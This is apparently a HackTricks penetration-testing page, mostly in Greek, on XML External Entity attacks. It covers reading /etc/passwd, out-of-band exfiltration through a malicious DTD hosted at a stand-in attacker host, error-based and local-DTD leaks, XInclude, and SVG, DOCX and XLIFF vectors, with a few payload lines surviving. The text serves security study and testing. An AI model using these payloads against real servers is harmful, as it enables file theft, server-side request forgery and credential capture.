XXE - XEE - XML External Entity
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Το XML είναι μια γλώσσα σήμανσης σχεδιασμένη για αποθήκευση και μεταφορά δεδομένων, με μια ευέλικτη δομή που επιτρέπει τη χρήση περιγραφικών ετικετών. Διαφέρει από το HTML καθώς δεν περιορίζεται σε ένα σύνολο προκαθορισμένων ετικετών. Η σημασία του XML έχει μειωθεί με την άνοδο του JSON, παρά τον αρχικό του ρόλο στην τεχνολογία AJAX.
Αναπαράσταση Δεδομένων μέσω Οντοτήτων: Οι οντότητες στο XML επιτρέπουν την αναπαράσταση δεδομένων, συμπεριλαμβανομένων ειδικών χαρακτήρων όπως <
και >
, που αντιστοιχούν σε <
και >
για να αποφευχθεί η σύγκρουση με το σύστημα ετικετών του XML.
Ορισμός Στοιχείων XML: Το XML επιτρέπει τον ορισμό τύπων στοιχείων, περιγράφοντας πώς θα πρέπει να δομούνται τα στοιχεία και τι περιεχόμενο μπορεί να περιέχουν, από οποιοδήποτε τύπο περιεχομένου έως συγκεκριμένα υποστοιχεία.
Ορισμός Τύπου Εγγράφου (DTD): Τα DTD είναι κρίσιμα στο XML για τον ορισμό της δομής του εγγράφου και των τύπων δεδομένων που μπορεί να περιέχει. Μπορούν να είναι εσωτερικά, εξωτερικά ή ένας συνδυασμός, καθοδηγώντας το πώς μορφοποιούνται και επικυρώνονται τα έγγραφα.
Προσαρμοσμένες και Εξωτερικές Οντότητες: Το XML υποστηρίζει τη δημιουργία προσαρμοσμένων οντοτήτων εντός ενός DTD για ευέλικτη αναπαράσταση δεδομένων. Οι εξωτερικές οντότητες, που ορίζονται με μια διεύθυνση URL, εγείρουν ανησυχίες ασφαλείας, ιδιαίτερα στο πλαίσιο επιθέσεων XML External Entity (XXE), οι οποίες εκμεταλλεύονται τον τρόπο που οι αναλυτές XML χειρίζονται εξωτερικές πηγές δεδομένων: <!DOCTYPE foo [ <!ENTITY myentity "value" > ]>
Ανίχνευση XXE με Οντότητες Παραμέτρων: Για την ανίχνευση ευπαθειών XXE, ειδικά όταν οι συμβατικές μέθοδοι αποτυγχάνουν λόγω μέτρων ασφαλείας του αναλυτή, μπορούν να χρησιμοποιηθούν οντότητες παραμέτρων XML. Αυτές οι οντότητες επιτρέπουν τεχνικές ανίχνευσης εκτός ζώνης, όπως η ενεργοποίηση αναζητήσεων DNS ή HTTP αιτημάτων σε έναν ελεγχόμενο τομέα, για να επιβεβαιωθεί η ευπάθεια.
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>
Σε αυτή την επίθεση θα δοκιμάσω αν μια απλή δήλωση ΝΕΑΣ ΟΝΤΟΤΗΤΑΣ λειτουργεί.
Ας προσπαθήσουμε να διαβάσουμε το /etc/passwd
με διάφορους τρόπους. Για Windows μπορείτε να προσπαθήσετε να διαβάσετε: C:\windows\system32\drivers\etc\hosts
Σε αυτή την πρώτη περίπτωση, παρατηρήστε ότι το SYSTEM "**file:///**etc/passwd" θα λειτουργήσει επίσης.
Αυτή η δεύτερη περίπτωση θα πρέπει να είναι χρήσιμη για την εξαγωγή ενός αρχείου αν ο διακομιστής ιστού χρησιμοποιεί PHP (Δεν ισχύει για τα εργαστήρια του Portswigger)
Σε αυτή την τρίτη περίπτωση παρατηρήστε ότι δηλώνουμε το Element stockCheck
ως ANY
Σε εφαρμογές που βασίζονται σε Java, μπορεί να είναι δυνατό να καταχωρήσετε τα περιεχόμενα ενός καταλόγου μέσω XXE με ένα payload όπως (απλώς ζητώντας τον κατάλογο αντί για το αρχείο):
Ένα XXE θα μπορούσε να χρησιμοποιηθεί για να καταχραστεί μια SSRF μέσα σε ένα cloud
Χρησιμοποιώντας την προηγουμένως σχολιασμένη τεχνική μπορείτε να κάνετε τον διακομιστή να έχει πρόσβαση σε έναν διακομιστή που ελέγχετε για να δείξετε ότι είναι ευάλωτος. Αλλά, αν αυτό δεν λειτουργεί, ίσως είναι επειδή οι XML οντότητες δεν επιτρέπονται, σε αυτή την περίπτωση θα μπορούσατε να δοκιμάσετε να χρησιμοποιήσετε XML παραμετρικές οντότητες:
Σε αυτή την περίπτωση θα κάνουμε τον διακομιστή να φορτώσει μια νέα DTD με ένα κακόβουλο payload που θα στείλει το περιεχόμενο ενός αρχείου μέσω HTTP αιτήματος (για αρχεία πολλαπλών γραμμών μπορείτε να προσπαθήσετε να το εξαγάγετε μέσω _ftp://_ χρησιμοποιώντας αυτόν τον βασικό διακομιστή για παράδειγμα xxe-ftp-server.rb). Αυτή η εξήγηση βασίζεται σε Portswiggers lab εδώ.
Στην δεδομένη κακόβουλη DTD, μια σειρά βημάτων εκτελούνται για να εξαγάγουν δεδομένα:
Η δομή είναι ως εξής:
Τα βήματα που εκτελούνται από αυτήν την DTD περιλαμβάνουν:
Ορισμός Οντοτήτων Παραμέτρων:
Μια XML οντότητα παραμέτρου, %file
, δημιουργείται, διαβάζοντας το περιεχόμενο του αρχείου /etc/hostname
.
Μια άλλη XML οντότητα παραμέτρου, %eval
, ορίζεται. Δημιουργεί δυναμικά μια νέα XML οντότητα παραμέτρου, %exfiltrate
. Η οντότητα %exfiltrate
ρυθμίζεται ώστε να κάνει ένα HTTP αίτημα στον διακομιστή του επιτιθέμενου, περνώντας το περιεχόμενο της οντότητας %file
μέσα στη συμβολοσειρά ερωτήματος της διεύθυνσης URL.
Εκτέλεση Οντοτήτων:
Η οντότητα %eval
χρησιμοποιείται, οδηγώντας στην εκτέλεση της δυναμικής δήλωσης της οντότητας %exfiltrate
.
Στη συνέχεια, η οντότητα %exfiltrate
χρησιμοποιείται, ενεργοποιώντας ένα HTTP αίτημα στη συγκεκριμένη διεύθυνση URL με το περιεχόμενο του αρχείου.
Ο επιτιθέμενος φιλοξενεί αυτήν την κακόβουλη DTD σε έναν διακομιστή υπό τον έλεγχό του, συνήθως σε μια διεύθυνση URL όπως http://web-attacker.com/malicious.dtd
.
XXE Payload: Για να εκμεταλλευτεί μια ευάλωτη εφαρμογή, ο επιτιθέμενος στέλνει ένα XXE payload:
This payload defines an XML parameter entity %xxe
and incorporates it within the DTD. When processed by an XML parser, this payload fetches the external DTD from the attacker's server. The parser then interprets the DTD inline, executing the steps outlined in the malicious DTD and leading to the exfiltration of the /etc/hostname
file to the attacker's server.
Σε αυτή την περίπτωση, θα κάνουμε τον διακομιστή να φορτώσει μια κακόβουλη DTD που θα δείξει το περιεχόμενο ενός αρχείου μέσα σε ένα μήνυμα σφάλματος (αυτό είναι έγκυρο μόνο αν μπορείτε να δείτε μηνύματα σφάλματος). Παράδειγμα από εδώ.
Ένα μήνυμα σφάλματος ανάλυσης XML, αποκαλύπτοντας τα περιεχόμενα του αρχείου /etc/passwd
, μπορεί να προκληθεί χρησιμοποιώντας μια κακόβουλη εξωτερική Οριστική Τύπου Εγγράφου (DTD). Αυτό επιτυγχάνεται μέσω των παρακάτω βημάτων:
Ορίζεται μια XML παράμετρος οντότητας με το όνομα file
, η οποία περιέχει τα περιεχόμενα του αρχείου /etc/passwd
.
Ορίζεται μια XML παράμετρος οντότητας με το όνομα eval
, ενσωματώνοντας μια δυναμική δήλωση για μια άλλη XML παράμετρο οντότητας με το όνομα error
. Αυτή η οντότητα error
, όταν αξιολογηθεί, προσπαθεί να φορτώσει ένα ανύπαρκτο αρχείο, ενσωματώνοντας τα περιεχόμενα της οντότητας file
ως το όνομά της.
Η οντότητα eval
καλείται, οδηγώντας στη δυναμική δήλωση της οντότητας error
.
Η κλήση της οντότητας error
έχει ως αποτέλεσμα μια προσπάθεια φόρτωσης ενός ανύπαρκτου αρχείου, παράγοντας ένα μήνυμα σφάλματος που περιλαμβάνει τα περιεχόμενα του αρχείου /etc/passwd
ως μέρος του ονόματος του αρχείου.
Η κακόβουλη εξωτερική DTD μπορεί να κληθεί με το παρακάτω XML:
Upon execution, the web server's response should include an error message displaying the contents of the /etc/passwd
file.
Παρακαλώ σημειώστε ότι η εξωτερική DTD μας επιτρέπει να συμπεριλάβουμε μία οντότητα μέσα στη δεύτερη (eval
), αλλά αυτό απαγορεύεται στην εσωτερική DTD. Επομένως, δεν μπορείτε να προκαλέσετε ένα σφάλμα χωρίς να χρησιμοποιήσετε μια εξωτερική DTD (συνήθως).
So what about blind XXE vulnerabilities when out-of-band interactions are blocked (external connections aren't available)?
A loophole in the XML language specification can expose sensitive data through error messages when a document's DTD blends internal and external declarations. This issue allows for the internal redefinition of entities declared externally, facilitating the execution of error-based XXE attacks. Such attacks exploit the redefinition of an XML parameter entity, originally declared in an external DTD, from within an internal DTD. When out-of-band connections are blocked by the server, attackers must rely on local DTD files to conduct the attack, aiming to induce a parsing error to reveal sensitive information.
Consider a scenario where the server's filesystem contains a DTD file at /usr/local/app/schema.dtd
, defining an entity named custom_entity
. An attacker can induce an XML parsing error revealing the contents of the /etc/passwd
file by submitting a hybrid DTD as follows:
The outlined steps are executed by this DTD:
Ο ορισμός μιας XML παραμέτρου οντότητας με το όνομα local_dtd
περιλαμβάνει το εξωτερικό αρχείο DTD που βρίσκεται στο σύστημα αρχείων του διακομιστή.
Μια επαναορισμός συμβαίνει για την XML παράμετρο οντότητας custom_entity
, που αρχικά ορίστηκε στο εξωτερικό DTD, για να περιλάβει μια εκμετάλλευση XXE βασισμένη σε σφάλματα. Αυτή η επαναορισμός έχει σχεδιαστεί για να προκαλέσει ένα σφάλμα ανάλυσης, εκθέτοντας το περιεχόμενο του αρχείου /etc/passwd
.
Χρησιμοποιώντας την οντότητα local_dtd
, το εξωτερικό DTD ενεργοποιείται, περιλαμβάνοντας την νεοκαθορισμένη custom_entity
. Αυτή η ακολουθία ενεργειών προκαλεί την εκπομπή του μηνύματος σφάλματος που επιδιώκεται από την εκμετάλλευση.
Real world example: Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd
containing an entity called ISOamso
Καθώς αυτή η τεχνική χρησιμοποιεί ένα εσωτερικό DTD, πρέπει πρώτα να βρείτε ένα έγκυρο. Μπορείτε να το κάνετε αυτό εγκαθιστώντας το ίδιο Λειτουργικό Σύστημα / Λογισμικό που χρησιμοποιεί ο διακομιστής και αναζητώντας μερικά προεπιλεγμένα DTDs, ή λαμβάνοντας μια λίστα με προεπιλεγμένα DTDs μέσα σε συστήματα και ελέγχοντας αν κάποιο από αυτά υπάρχει:
Για περισσότερες πληροφορίες ελέγξτε https://portswigger.net/web-security/xxe/blind
Στο παρακάτω καταπληκτικό github repo μπορείτε να βρείτε διαδρομές DTDs που μπορεί να υπάρχουν στο σύστημα:
Επιπλέον, αν έχετε την εικόνα Docker του συστήματος-θύματος, μπορείτε να χρησιμοποιήσετε το εργαλείο του ίδιου repo για να σκανάρετε την εικόνα και να βρείτε τη διαδρομή των DTDs που υπάρχουν μέσα στο σύστημα. Διαβάστε το Readme του github για να μάθετε πώς.
Για μια πιο λεπτομερή εξήγηση αυτής της επίθεσης, ελέγξτε τη δεύτερη ενότητα του αυτού του καταπληκτικού άρθρου από την Detectify.
Η δυνατότητα να ανεβάζουν έγγραφα Microsoft Office προσφέρεται από πολλές διαδικτυακές εφαρμογές, οι οποίες στη συνέχεια προχωρούν στην εξαγωγή ορισμένων λεπτομερειών από αυτά τα έγγραφα. Για παράδειγμα, μια διαδικτυακή εφαρμογή μπορεί να επιτρέπει στους χρήστες να εισάγουν δεδομένα ανεβάζοντας ένα υπολογιστικό φύλλο σε μορφή XLSX. Για να μπορέσει ο αναλυτής να εξαγάγει τα δεδομένα από το υπολογιστικό φύλλο, θα χρειαστεί αναπόφευκτα να αναλύσει τουλάχιστον ένα XML αρχείο.
Για να δοκιμαστεί αυτή η ευπάθεια, είναι απαραίτητο να δημιουργηθεί ένα αρχείο Microsoft Office που περιέχει ένα XXE payload. Το πρώτο βήμα είναι να δημιουργηθεί ένας κενός φάκελος στον οποίο μπορεί να αποσυμπιεστεί το έγγραφο.
Αφού το έγγραφο έχει αποσυμπιεστεί, το XML αρχείο που βρίσκεται στο ./unzipped/word/document.xml
θα πρέπει να ανοιχτεί και να επεξεργαστεί σε έναν προτιμώμενο επεξεργαστή κειμένου (όπως το vim). Το XML θα πρέπει να τροποποιηθεί ώστε να περιλαμβάνει το επιθυμητό XXE payload, συχνά ξεκινώντας με ένα HTTP αίτημα.
Οι τροποποιημένες γραμμές XML θα πρέπει να εισαχθούν μεταξύ των δύο ριζικών XML αντικειμένων. Είναι σημαντικό να αντικατασταθεί η διεύθυνση URL με μια παρακολουθήσιμη διεύθυνση URL για τα αιτήματα.
Τέλος, το αρχείο μπορεί να συμπιεστεί για να δημιουργηθεί το κακόβουλο poc.docx αρχείο. Από τον προηγουμένως δημιουργημένο φάκελο "unzipped", θα πρέπει να εκτελεστεί η εξής εντολή:
Τώρα, το δημιουργημένο αρχείο μπορεί να ανέβει στην ενδεχομένως ευάλωτη διαδικτυακή εφαρμογή, και μπορεί κανείς να ελπίζει ότι θα εμφανιστεί ένα αίτημα στα αρχεία καταγραφής του Burp Collaborator.
Το jar πρωτόκολλο είναι προσβάσιμο αποκλειστικά εντός Java εφαρμογών. Είναι σχεδιασμένο για να επιτρέπει την πρόσβαση σε αρχεία εντός ενός PKZIP αρχείου (π.χ., .zip
, .jar
, κ.λπ.), εξυπηρετώντας τόσο τοπικά όσο και απομακρυσμένα αρχεία.
Για να μπορέσετε να αποκτήσετε πρόσβαση σε αρχεία μέσα σε αρχεία PKZIP είναι πολύ χρήσιμο για την κατάχρηση XXE μέσω αρχείων DTD συστήματος. Ελέγξτε αυτή την ενότητα για να μάθετε πώς να καταχραστείτε τα αρχεία DTD συστήματος.
Η διαδικασία πίσω από την πρόσβαση σε ένα αρχείο μέσα σε ένα αρχείο PKZIP μέσω του πρωτοκόλλου jar περιλαμβάνει αρκετά βήματα:
Γίνεται ένα HTTP αίτημα για να κατεβάσετε το αρχείο zip από μια καθορισμένη τοποθεσία, όπως https://download.website.com/archive.zip
.
Η HTTP απάντηση που περιέχει το αρχείο αποθηκεύεται προσωρινά στο σύστημα, συνήθως σε μια τοποθεσία όπως /tmp/...
.
Το αρχείο εξάγεται για να αποκτήσετε πρόσβαση στα περιεχόμενά του.
Το συγκεκριμένο αρχείο μέσα στο αρχείο, file.zip
, διαβάζεται.
Μετά τη διαδικασία, οποιαδήποτε προσωρινά αρχεία που δημιουργήθηκαν κατά τη διάρκεια αυτής της διαδικασίας διαγράφονται.
Μια ενδιαφέρουσα τεχνική για να διακόψετε αυτή τη διαδικασία στο δεύτερο βήμα περιλαμβάνει τη διατήρηση της σύνδεσης του διακομιστή ανοιχτής επ' αόριστον κατά την εξυπηρέτηση του αρχείου αρχείου. Εργαλεία διαθέσιμα σε αυτό το αποθετήριο μπορούν να χρησιμοποιηθούν για αυτό το σκοπό, συμπεριλαμβανομένου ενός διακομιστή Python (slow_http_server.py
) και ενός διακομιστή Java (slowserver.jar
).
Η εγγραφή αρχείων σε έναν προσωρινό φάκελο μπορεί να βοηθήσει στην κλιμάκωση μιας άλλης ευπάθειας που περιλαμβάνει διαδρομή διαδρομής (όπως το local file include, template injection, XSLT RCE, deserialization, κ.λπ.).
Σε υπολογιστές Windows, είναι δυνατή η λήψη του NTML hash του χρήστη του web server ρυθμίζοντας έναν χειριστή responder.py:
και στέλνοντας το παρακάτω αίτημα
Then you can try to crack the hash using hashcat
Όταν ενσωματώνετε δεδομένα πελάτη σε έγγραφα XML πλευράς διακομιστή, όπως αυτά σε αιτήματα SOAP backend, ο άμεσος έλεγχος της δομής XML είναι συχνά περιορισμένος, εμποδίζοντας τις παραδοσιακές επιθέσεις XXE λόγω περιορισμών στην τροποποίηση του στοιχείου DOCTYPE
. Ωστόσο, μια επίθεση XInclude
παρέχει μια λύση επιτρέποντας την εισαγωγή εξωτερικών οντοτήτων μέσα σε οποιοδήποτε στοιχείο δεδομένων του εγγράφου XML. Αυτή η μέθοδος είναι αποτελεσματική ακόμη και όταν μόνο ένα μέρος των δεδομένων μέσα σε ένα έγγραφο XML που έχει παραχθεί από διακομιστή μπορεί να ελεγχθεί.
Για να εκτελέσετε μια επίθεση XInclude
, πρέπει να δηλωθεί ο χώρος ονομάτων XInclude
, και η διαδρομή αρχείου για την προοριζόμενη εξωτερική οντότητα πρέπει να καθοριστεί. Παρακάτω είναι ένα συνοπτικό παράδειγμα του πώς μπορεί να διαμορφωθεί μια τέτοια επίθεση:
Check https://portswigger.net/web-security/xxe for more info!
Τα αρχεία που ανεβάζουν οι χρήστες σε ορισμένες εφαρμογές, τα οποία στη συνέχεια επεξεργάζονται στον διακομιστή, μπορούν να εκμεταλλευτούν ευπάθειες στον τρόπο που διαχειρίζονται τα XML ή τα αρχεία που περιέχουν XML. Κοινές μορφές αρχείων όπως έγγραφα γραφείου (DOCX) και εικόνες (SVG) βασίζονται σε XML.
Όταν οι χρήστες ανεβάζουν εικόνες, αυτές οι εικόνες επεξεργάζονται ή επικυρώνονται στον διακομιστή. Ακόμη και για εφαρμογές που αναμένουν μορφές όπως PNG ή JPEG, η βιβλιοθήκη επεξεργασίας εικόνας του διακομιστή μπορεί επίσης να υποστηρίζει εικόνες SVG. Το SVG, ως μορφή βασισμένη σε XML, μπορεί να εκμεταλλευτεί από επιτιθέμενους για να υποβάλουν κακόβουλες εικόνες SVG, εκθέτοντας έτσι τον διακομιστή σε ευπάθειες XXE (XML External Entity).
Ένα παράδειγμα μιας τέτοιας εκμετάλλευσης φαίνεται παρακάτω, όπου μια κακόβουλη εικόνα SVG προσπαθεί να διαβάσει αρχεία συστήματος:
Ένας άλλος τρόπος περιλαμβάνει την προσπάθεια εκτέλεσης εντολών μέσω του PHP "expect" wrapper:
Σε και τις δύο περιπτώσεις, η μορφή SVG χρησιμοποιείται για να εκκινήσει επιθέσεις που εκμεταλλεύονται τις δυνατότητες επεξεργασίας XML του λογισμικού του διακομιστή, υπογραμμίζοντας την ανάγκη για ισχυρή επικύρωση εισόδου και μέτρα ασφαλείας.
Δείτε https://portswigger.net/web-security/xxe για περισσότερες πληροφορίες!
Σημειώστε ότι η πρώτη γραμμή του αναγνωσμένου αρχείου ή του αποτελέσματος της εκτέλεσης θα εμφανιστεί ΜΕΣΑ στην δημιουργημένη εικόνα. Έτσι, πρέπει να μπορείτε να έχετε πρόσβαση στην εικόνα που έχει δημιουργήσει το SVG.
Διαβάστε την παρακάτω ανάρτηση για να μάθετε πώς να εκμεταλλευτείτε μια XXE ανεβάζοντας ένα αρχείο PDF:
PDF Upload - XXE and CORS bypassΕάν ένα αίτημα POST δέχεται τα δεδομένα σε μορφή XML, θα μπορούσατε να προσπαθήσετε να εκμεταλλευτείτε μια XXE σε αυτό το αίτημα. Για παράδειγμα, εάν ένα κανονικό αίτημα περιέχει τα εξής:
Τότε μπορεί να είστε σε θέση να υποβάλετε το ακόλουθο αίτημα, με το ίδιο αποτέλεσμα:
Για να αλλάξετε το αίτημα, μπορείτε να χρησιμοποιήσετε μια επέκταση του Burp που ονομάζεται “Content Type Converter“. Εδώ μπορείτε να βρείτε αυτό το παράδειγμα:
Ένα άλλο παράδειγμα μπορεί να βρεθεί εδώ.
This only work if the XML server accepts the data://
protocol.
You can use the ["Encode Recipe" of cyberchef here ]([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) μετατρέψτε σε UTF-7.
Αν ο ιστότοπος χρησιμοποιεί PHP, αντί να χρησιμοποιήσετε file:/
μπορείτε να χρησιμοποιήσετε php wrappersphp://filter/convert.base64-encode/resource=
για να πρόσβαση σε εσωτερικά αρχεία.
Αν ο ιστότοπος χρησιμοποιεί Java, μπορείτε να ελέγξετε το jar: protocol.
Trick από https://github.com/Ambrotd/XXE-Notes Μπορείτε να δημιουργήσετε μια οντότητα μέσα σε μια οντότητα κωδικοποιώντας την με html entities και στη συνέχεια να την καλέσετε για να φορτώσετε ένα dtd. Σημειώστε ότι οι HTML Entities που χρησιμοποιούνται πρέπει να είναι αριθμητικές (όπως [σε αυτό το παράδειγμα](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\).
DTD παράδειγμα:
Εξαγωγή index.php
Αν το module "expect" του PHP είναι φορτωμένο
Αυτό το παράδειγμα είναι εμπνευσμένο από https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe
Το XLIFF (XML Localization Interchange File Format) χρησιμοποιείται για την τυποποίηση της ανταλλαγής δεδομένων στις διαδικασίες τοπικοποίησης. Είναι μια μορφή βασισμένη σε XML που χρησιμοποιείται κυρίως για τη μεταφορά τοπικοποιήσιμων δεδομένων μεταξύ εργαλείων κατά τη διάρκεια της τοπικοποίησης και ως κοινή μορφή ανταλλαγής για εργαλεία CAT (Computer-Aided Translation).
Ένα αίτημα αποστέλλεται στον διακομιστή με το εξής περιεχόμενο:
Ωστόσο, αυτό το αίτημα προκαλεί ένα σφάλμα εσωτερικού διακομιστή, αναφέροντας συγκεκριμένα ένα πρόβλημα με τις δηλώσεις markup:
Παρά το σφάλμα, καταγράφεται μια επιτυχία στο Burp Collaborator, υποδεικνύοντας κάποιο επίπεδο αλληλεπίδρασης με την εξωτερική οντότητα.
Out of Band Data Exfiltration Για να εξάγουμε δεδομένα, αποστέλλεται ένα τροποποιημένο αίτημα:
Αυτή η προσέγγιση αποκαλύπτει ότι ο User Agent υποδεικνύει τη χρήση του Java 1.8. Ένας παρατηρούμενος περιορισμός με αυτή την έκδοση του Java είναι η αδυναμία ανάκτησης αρχείων που περιέχουν χαρακτήρα νέας γραμμής, όπως το /etc/passwd, χρησιμοποιώντας την τεχνική Out of Band.
Error-Based Data Exfiltration Για να ξεπεραστεί αυτός ο περιορισμός, χρησιμοποιείται μια προσέγγιση Error-Based. Το αρχείο DTD είναι δομημένο ως εξής για να προκαλέσει ένα σφάλμα που περιλαμβάνει δεδομένα από ένα στοχευμένο αρχείο:
Ο διακομιστής απαντά με ένα σφάλμα, το οποίο σημαντικά αντικατοπτρίζει το ανύπαρκτο αρχείο, υποδεικνύοντας ότι ο διακομιστής προσπαθεί να αποκτήσει πρόσβαση στο καθορισμένο αρχείο:
Για να συμπεριληφθεί το περιεχόμενο του αρχείου στο μήνυμα σφάλματος, το αρχείο DTD προσαρμόζεται:
Αυτή η τροποποίηση οδηγεί στην επιτυχή εξαγωγή του περιεχομένου του αρχείου, καθώς αντικατοπτρίζεται στην έξοδο σφάλματος που αποστέλλεται μέσω HTTP. Αυτό υποδηλώνει μια επιτυχημένη επίθεση XXE (XML External Entity), εκμεταλλευόμενη τόσο τις τεχνικές Out of Band όσο και τις τεχνικές Error-Based για την εξαγωγή ευαίσθητων πληροφοριών.
Έγκυρο XML με μορφή RSS για την εκμετάλλευση μιας ευπάθειας XXE.
Απλό HTTP αίτημα στον διακομιστή των επιτιθεμένων
Χρησιμοποιώντας το φίλτρο base64 της PHP
Το XMLDecoder είναι μια κλάση Java που δημιουργεί αντικείμενα με βάση ένα μήνυμα XML. Εάν ένας κακόβουλος χρήστης μπορέσει να κάνει μια εφαρμογή να χρησιμοποιήσει αυθαίρετα δεδομένα σε μια κλήση στη μέθοδο readObject, θα αποκτήσει αμέσως εκτέλεση κώδικα στον διακομιστή.
Εξαγωγή πληροφοριών μέσω HTTP χρησιμοποιώντας δικό σας εξωτερικό DTD: https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/\
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)